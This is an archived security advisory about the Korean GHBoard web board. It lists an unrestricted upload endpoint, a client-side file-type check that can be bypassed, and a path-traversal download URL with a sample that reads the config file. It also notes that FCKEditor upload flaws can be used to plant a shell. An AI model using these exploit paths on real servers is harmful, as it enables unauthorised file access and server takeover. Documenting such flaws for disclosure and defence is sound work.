TUCoPS :: Web BBS :: etc :: tb13107.htm

Korean GHBoard Multiple Vulnerabilities by Xcross87
Korean GHBoard Multiple Vulnerabilities by Xcross87
Korean GHBoard Multiple Vulnerabilities by Xcross87



Software : Korean GHBoard=0D
Site : http://www.ghlab.com/=0D 
Found by : Xcross87=0D
1. File Upload Vulnerability=0D
Xploit :=0D
victim.com/ghboard/component/upload.jsp=0D
=0D
2. FlashUpload component File Upload and File Download Vulnerability=0D
Upload Xploit :=0D
victim.com/ghboard/component/flashupload/upload.html=0D
Not allow upload php,jsp,html=0D
But attacker can download source and remove javascript code which check for file type and upload easily.=0D
Uploaded file is located in :=0D
victim.com/ghboard/component/flashupload/data/upload_filename.xxx=0D
=0D
Download Xploit :=0D
You can download any file from server :=0D
victim.com/ghboard/component/flashupload/download.jsp?name=[file_name]=0D
Sample :=0D
victim.com/ghboard/component/flashupload/download.jsp?name=../config.jsp=0D
=0D
3. FCK Inclusion :=0D
All version of GHBoard includes FCKEditor package so attacker can use upload vulz of FCKEditor to up shell to server.=0D
=0D
=== Xcross87 | HCETeam Xploiter | HCEGroup.Vn ==

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH